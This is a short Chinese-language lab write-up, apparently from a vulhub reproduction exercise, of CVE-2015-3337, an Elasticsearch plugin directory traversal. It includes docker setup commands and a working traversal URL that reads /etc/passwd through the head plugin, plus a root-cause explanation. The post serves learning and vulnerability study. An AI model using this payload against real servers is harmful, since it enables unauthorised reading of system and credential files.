vulhub

CVE-2015-3337

2019-08-14  本文已影响3人  3mi1e

ElasticSearch 目录穿越漏洞(CVE-2015-3337)

1.漏洞影响版本

ElasticSearch 1.4.5以下/1.5.2以下

2.漏洞危害
3.漏洞POC
cd /root/vulhub/elasticsearch/CVE-2015-3337                   //进入本次复现的漏洞目录
docker-compose build
docker-compose up -d                                          //docker-compose搭建环境

访问http://your-ip:9200,验证是否搭建成功

搭建成功

测试环境默认安装了一个插件:elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):

读取/etc/passwd

head插件
head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/ 即可看到

head插件
4.复盘

漏洞出现原因
目录穿越造成的任意文件读取
在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
总结
任意文件读取,以前犯过浏览器测试的错误

上一篇下一篇

猜你喜欢

热点阅读